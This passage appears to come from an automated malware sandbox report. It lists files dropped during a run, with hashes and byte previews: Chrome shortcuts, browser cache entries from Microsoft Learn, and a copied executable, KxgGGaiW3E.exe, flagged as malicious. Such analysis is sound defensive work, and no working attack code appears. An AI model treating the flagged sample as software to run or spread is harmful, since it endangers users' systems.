File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2693
Entropy (8bit):	4.005214086342708
Encrypted:	false
SSDEEP:	48:8xjdST+isHqidAKZdA14tseh7sFiZUkmgqeh7sYy+BX:8x0bHnqy
MD5:	9258FDDF93BEED5862E10487591BF41A
SHA1:	FAC4EA1BA3EFD685B2B0B73C6099698E328FBAC7
SHA-256:	6C4708809ABDE5F6ECDE42C4037236687762AB79F1AC8DE4A6D7A46CE2C12EA4
SHA-512:	F350663C19085061F15B8594F9D42E61EB16B98DF46307783FA01F9B215F29C4CF5B2CC075708A2F2E25511ABA02356AEF4F3D0FF0151751F578A06A579C1202
Malicious:	false
Preview:	L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.XH.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XH.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XH.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XH............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............X.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Apr 23 20:02:19 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.994140367933374
Encrypted:	false
SSDEEP:	48:89dST+i+HqidAKZdA1vehDiZUkwqehCy+R:8CbqQy
MD5:	4BFCF8EF0311D872836D07B665E57BE8
SHA1:	E9633510FA1A326AADF2F981655BBC91EDA15231
SHA-256:	4736524973CAAE7A3723369EE37F6D5CCF671641284C5146C440FDB12363C607
SHA-512:	5DBD45A3036964EB54B879D5E9B0672FC9CA4D97D8EBD481AF1EED2766FA116B4E5C8C07BE4093C29C9326B45DEC1449381DBBAF64D17CA014DDD0B32BB71B8B
Malicious:	false
Preview:	L..................F.@.. ...$+.,.....Nf.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.XH.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XH.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XH.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XH............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XJ............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............X.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Apr 23 20:02:20 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.9845070000348204
Encrypted:	false
SSDEEP:	48:8ZdST+i+HqidAKZdA1hehBiZUk1W1qehEy+C:82bK9ky
MD5:	5C108067F359441369D01DA94FFE8438
SHA1:	1FB4F79F26BE74D48AD64A0CAFE745C483889129
SHA-256:	474C15AF45D17F18E22E2EBB8751F0FC8ED018F23132BE92E6995A7AA1B16CD7
SHA-512:	01696EBE65BFE00EA53B6EA363C8969E8A73CF0D8B394139AA4C9E4797BB6F8E9AE549C6A3736380EEBA909053E0220481C15BC1AEE27B1EBA51DD265F529C32
Malicious:	false
Preview:	L..................F.@.. ...$+.,....^.G.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.XH.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XH.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XH.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XH............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XJ............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............X.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Apr 23 20:02:19 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2683
Entropy (8bit):	3.99401203290252
Encrypted:	false
SSDEEP:	48:8DdST+i+HqidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbqy+yT+:8UbUT/TbxWOvTbqy7T
MD5:	93EEB1FDACFB866F5E35BE8E8AF8927A
SHA1:	9E76F35B43B41AA642A6C3BD216DDEBC428E6335
SHA-256:	483198E1037A5164A236CA7EB29550267D998EF4AEACE1ED56DB2E00AC858549
SHA-512:	0C741692745A5A53136D44CD1A8BCD34E9A4A99C4FB3DE4B360DD6566D07E8630841B7CCD9A6804B410028CD79009A9DDDF9AF314AD88AB87481CD850F65156B
Malicious:	false
Preview:	L..................F.@.. ...$+.,.....WV.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.XH.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XH.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XH.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XH............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XJ............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............X.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\KxgGGaiW3E.exe

Download File

Process:	C:\Users\user\Desktop\KxgGGaiW3E.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6679218
Entropy (8bit):	7.504250528691307
Encrypted:	false
SSDEEP:	98304:DpgFmZKkYcZ4YSQrKF78eHm8Xdt6Zz55JJ9enfr:uFmZOcZtrKFFHm8t0NJJo
MD5:	EB0BEAFCB365CD20EB00FF9E19B73232
SHA1:	1A4470109418E1110588D52851E320ECEFCBA7DE
SHA-256:	31B494BE325FC9C97031135886454B1370E5E3608C757F74784C6B6FB2FB5C99
SHA-512:	8DFF151E81B5CE3C4F51B1F24A6E7654C3008D81B6652E6D2F7FABC42D341E9DB703B12F83CCF9471514498AF3C1763EF97F132AD36302DE8CCD984FBF52D52F
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y.,=...=...=...;4.~1...;4.~,...;4.~....4.e.3...v..~6...=...)...W4.~6...W4.~x...=...?...W4.~<...W4..<...W4.~<...Rich=...........................PE..d.....&f.........."....&......................@.............................P5...........`.........................................../.X...h./......04.D....P2.H............@4.T...`?......................A.(... >*.@............0.. ............................text....F.......H.................. ..`.managed.....`.......L.............. ..`.rdata.......0......................@..@.data........0/......./.............@....pdata..H....P2......81.............@..@_RDATA....... 4.......3.............@..@.rsrc...D....04.......3.............@..@.reloc..T....@4.......3.............@..B................................................................................................................................................

C:\Users\user\KxgGGaiW3E.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\KxgGGaiW3E.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Chrome Cache Entry: 112

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF line terminators
Category:	downloaded
Size (bytes):	1478
Entropy (8bit):	5.030941252322257
Encrypted:	false
SSDEEP:	24:TGAg3Efef6tfTf/fffCfxfdffW4N5f0f8fK8zyRWmmkYRWDKslbzP3LTPv4NUhqI:TK0W6bXnq512ysUbkfKCvUjeGxbu
MD5:	020629EBA820F2E09D8CDA1A753C032B
SHA1:	D91A65036E4C36B07AE3641E32F23F8DD616BD17
SHA-256:	F8AE8A1DC7CE7877B9FB9299183D2EBB3BEFAD0B6489AE785D99047EC2EB92D1
SHA-512:	EF5A5C7A301DE55D103B1BE375D988970D9C4ECD62CE464F730C49E622128F431761D641E1DFAA32CA03F8280B435AE909486806DF62A538B48337725EB63CE1
Malicious:	false
URL:	https://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/global/67a45209.deprecation.js
Preview:	// ES5 script for back compat with unsupported browsers...!(function () {...'use strict';...// Keep in sync with environment/browser.ts...var supportedBrowser =....typeof Blob === 'function' &&....typeof PerformanceObserver === 'function' &&....typeof Intl === 'object' &&....typeof MutationObserver === 'function' &&....typeof URLSearchParams === 'function' &&....typeof WebSocket === 'function' &&....typeof IntersectionObserver === 'function' &&....typeof queueMicrotask === 'function' &&....typeof TextEncoder === 'function' &&....typeof TextDecoder === 'function' &&....typeof customElements === 'object' &&....typeof HTMLDetailsElement === 'function' &&....typeof AbortController === 'function' &&....typeof AbortSignal === 'function' &&....'entries' in FormData.prototype &&....'toggleAttribute' in Element.prototype &&....'replaceChildren' in Element.prototype &&....// ES2019....'fromEntries' in Object &&....'flatMap' in Array.prototype &&....'trimEnd' in String.prototype &&....// ES2020..

Chrome Cache Entry: 113

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	13339
Entropy (8bit):	7.683569563478597
Encrypted:	false
SSDEEP:	192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
MD5:	512625CF8F40021445D74253DC7C28C0
SHA1:	F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
SHA-256:	1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
SHA-512:	AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
Malicious:	false
Preview:	.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....\|../5_.......T...~.y.'.'.\|...W..[...C.)......\|.[.[WK...w...w..y.{..\|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....\|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..\|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m

Chrome Cache Entry: 114

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	18367
Entropy (8bit):	7.7772261735974215
Encrypted:	false
SSDEEP:	384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
MD5:	240C4CC15D9FD65405BB642AB81BE615
SHA1:	5A66783FE5DD932082F40811AE0769526874BFD3
SHA-256:	030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
SHA-512:	267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.png
Preview:	.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! ....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?\|..H+Dd.....Y%....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m

Chrome Cache Entry: 115

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	1154
Entropy (8bit):	4.59126408969148
Encrypted:	false
SSDEEP:	24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
MD5:	37258A983459AE1C2E4F1E551665F388
SHA1:	603A4E9115E613CC827206CF792C62AEB606C941
SHA-256:	8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
SHA-512:	184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
Malicious:	false
Preview:	<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V

Chrome Cache Entry: 116

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2574
Entropy (8bit):	4.80598049257081
Encrypted:	false
SSDEEP:	48:YWuel64qAq3DJJWuO6Z3Db8VgK/ni47ttbFSlA37ERw7II77Aj5M1:PvqAWDzO5tRNEYIOEjc
MD5:	B446C5E0EE48273D54D308DDD35F954A
SHA1:	AF12E4273BE6F0A860589CE36E08920BD2C8CAC2
SHA-256:	7A0A2780A1A8977683EF113DEA438AB2ECA1B99DA9CF67854662D51E08E6BF15
SHA-512:	8C1CCEC779CA25B8678079CC7C88890C718330F64C55437C7AC1107EE5F81D1117763667B840C59AD6BE9F1ECB367AC3B1E4EEE775A2E43C88F6317EE6892FE7
Malicious:	false
Preview:	{"items":[{"children":[{"children":[{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire (Preview)"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/index","href":"/dotnet/architecture/modern-web-apps-azure/","toc_title":"Modern ASP.NET web applications e-book"},{"homepage":"/dotnet/architecture/microservices/index","href":"/dotnet/architecture/microservices/","toc_title":".NET microservices - Architecture e-book"},{"homepage":"/dotnet/architecture/cloud-native/index","href":"/dotnet/architecture/cloud-native/","toc_title":"Cloud native"},{"homepage":"/dotnet/architecture/blazor-for-web-forms-developers/index","href":"/dotnet/architecture/blazor-for-web-forms-developers/","toc_title":"Blazor for

Chrome Cache Entry: 117

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	15427
Entropy (8bit):	7.784472070227724
Encrypted:	false
SSDEEP:	384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
MD5:	3062488F9D119C0D79448BE06ED140D8
SHA1:	8A148951C894FC9E968D3E46589A2E978267650E
SHA-256:	C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
SHA-512:	00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
Malicious:	false
Preview:	.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0-....\|...X..s...Z.Y{....w..5.._s..x...E.......... ..................... ..................{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`......4..G.\|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...\|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....

Chrome Cache Entry: 118

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	16
Entropy (8bit):	3.875
Encrypted:	false
SSDEEP:	3:HMB:k
MD5:	0B04EA412F8FC88B51398B1CBF38110E
SHA1:	E073BCC5A03E7BBA2A16CF201A3CED1BE7533FBF
SHA-256:	7562254FF78FD854F0A8808E75A406F5C6058B57B71514481DAE490FC7B8F4C3
SHA-512:	6D516068C3F3CBFC1500032E600BFF5542EE30C0EAC11A929EE002C707810BBF614A5586C2673EE959AFDF19C08F6EAEFA18193AD6CEDC839BDF249CF95E8079
Malicious:	false
URL:	https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAkEurwx6c-nJBIFDb_mJfI=?alt=proto
Preview:	CgkKBw2/5iXyGgA=

Chrome Cache Entry: 119

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	13100
Entropy (8bit):	5.176855971641256
Encrypted:	false
SSDEEP:	384:cF2jd3Y8nTnckYVYdOb/VdmFj/ZAA6SlB8qwV1sM5pNoEghVqQl3Tz5:62jJY8TcDiYb/VgFLyxOB8vV1sM7NoEe
MD5:	3B80CDF2C3556CFE9458577B5F2360B7
SHA1:	025EB63D8AB421A9E61F88D4924BEB11051B6411
SHA-256:	B72F34156103B51FD1F07E0ECB8958EAD34586C378FD383AE962EC927DB90F7D
SHA-512:	29A06D37422FD1D62ED3E557FDCF124BF421349F997AC812033F435BAB47ABEFDC3B1882066E152096A87AA46B6FCBCCA037209445F329CE92EA4A1D4CFC4E09
Malicious:	false
Preview:	{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"https://aka.ms/DevBox/Customizations?wt.mc_id=mdbservice_resources_webpage_learnpromotion_cnl","title":"Learn more"},"text":"Now in preview \| Microsoft Dev Box customizations features."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-03-31T04:00:00.000Z","paths":["/azure/dev-box/*"],"startDate":"2024-02-20T23:00:00.000Z"},"uid":"938234 live"},{"content":{"link":{"href":"https://aka.ms/MSLear

Chrome Cache Entry: 120

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (54649), with CRLF line terminators
Category:	downloaded
Size (bytes):	106026
Entropy (8bit):	5.171529071699513
Encrypted:	false
SSDEEP:	1536:JXQw7M1QH3FHimDA4A6b3UBm5AcTO5uIod:JXQ2tXUBmhLd
MD5:	A76A653DAAA136B17D3ABB880C159606
SHA1:	CEACBC85439BC26B17CB6B4422A8907CF446469C
SHA-256:	F50053CCD6D8CD18E2736166CE8376BBA8BC673C49AF7D96DFB8DFF7EC9BF715
SHA-512:	3FDAB4797F3CC73F2279887913970146894F441BE361512A2E5D14117B760AA193656B357CE8061E22967354544DC431599C1191860996EC3993FED5CA00B7E0
Malicious:	false
URL:	https://learn.microsoft.com/static/third-party/adobe-target/at-js/2.9.0/at.js
Preview:	// No custom JavaScript../*.. @license.. * at.js 2.9.0 \| (c) Adobe Systems Incorporated \| All rights reserved.. * zepto.js \| (c) 2010-2016 Thomas Fuchs \| zeptojs.com/license..*/..window.adobe=window.adobe\|\|{},window.adobe.target=function(){"use strict";var t=window,e=document,n=!e.documentMode\|\|e.documentMode>=11;var r,o,i,c=e.compatMode&&"CSS1Compat"===e.compatMode&&n&&(r=window.navigator.userAgent,o=r.indexOf("MSIE ")>0,i=r.indexOf("Trident/")>0,!(o\|\|i)),s=t.targetGlobalSettings;if(!c\|\|s&&!1===s.enabled)return t.adobe=t.adobe\|\|{},t.adobe.target={VERSION:"",event:{},getOffer:Ke,getOffers:yt,applyOffer:Ke,applyOffers:yt,sendNotifications:yt,trackEvent:Ke,triggerView:Ke,registerExtension:Ke,init:Ke},t.mboxCreate=Ke,t.mboxDefine=Ke,t.mboxUpdate=Ke,"console"in t&&"warn"in t.console&&(c\|\|t.console.warn("AT: Adobe Target content delivery is disabled. Update your DOCTYPE to support Standards mode."),t.console.warn("AT: Adobe Target content delivery is disabled in targetGlobalSettings.")),

Chrome Cache Entry: 121

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	downloaded
Size (bytes):	13100
Entropy (8bit):	5.176855971641256
Encrypted:	false
SSDEEP:	384:cF2jd3Y8nTnckYVYdOb/VdmFj/ZAA6SlB8qwV1sM5pNoEghVqQl3Tz5:62jJY8TcDiYb/VgFLyxOB8vV1sM7NoEe
MD5:	3B80CDF2C3556CFE9458577B5F2360B7
SHA1:	025EB63D8AB421A9E61F88D4924BEB11051B6411
SHA-256:	B72F34156103B51FD1F07E0ECB8958EAD34586C378FD383AE962EC927DB90F7D
SHA-512:	29A06D37422FD1D62ED3E557FDCF124BF421349F997AC812033F435BAB47ABEFDC3B1882066E152096A87AA46B6FCBCCA037209445F329CE92EA4A1D4CFC4E09
Malicious:	false
URL:	https://learn.microsoft.com/en-us/banners/index.json
Preview:	{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"https://aka.ms/DevBox/Customizations?wt.mc_id=mdbservice_resources_webpage_learnpromotion_cnl","title":"Learn more"},"text":"Now in preview \| Microsoft Dev Box customizations 